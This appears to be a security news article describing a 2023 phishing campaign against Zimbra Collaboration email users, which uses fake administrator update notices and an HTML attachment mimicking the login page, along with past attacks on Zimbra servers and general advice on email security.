A new phishing campaign targeting users of Zimbra Collaboration email servers has been identified by researchers, and it appears to be quite successful in tricking victims into revealing their login credentials.
Zimbra Collaboration is an online collaborative suite that includes an email server and a web client. The phishing campaign began in April 2023, with cybercriminals sending phishing emails to random victims in an attempt to steal login credentials for the service.
In these phishing emails, the attackers impersonate the victim organization’s administrator and inform the recipient that their email server is scheduled for an update. The email claims that this update could lead to inbox inaccessibility or even termination. To prevent this, the victim is instructed to open an HTML attachment for further instructions.
The attachment, however, does not contain any instructions. Instead, it presents a fake Zimbra login page with the victim’s username prefilled. If the user enters their password, it is sent to the attacker’s server via an HTTPS POST request.
In some instances, the attackers have also been using previously compromised admin accounts to create new accounts on Zimbra servers for the purpose of distributing these phishing emails. While the campaign’s tactics are not considered sophisticated, its success rate has been notable.
Zimbra Collaboration email servers have been frequently targeted by cybercriminals for various purposes. Some attackers use them for cyber espionage, gaining access to internal company communications. Others use these servers as an initial point of entry to move laterally within the target network.
In the past, Zimbra servers have been targeted in high-profile attacks. For example, a Russian threat actor exploited a vulnerability in Zimbra software to monitor emails from organizations linked to NATO, governments, diplomats, and military personnel. Additionally, a zero-day vulnerability in Zimbra was abused in a separate attack, compromising hundreds of servers.
Users and organizations are advised to remain vigilant against phishing attempts, keep software up to date, and follow best practices for email security to protect against such threats.
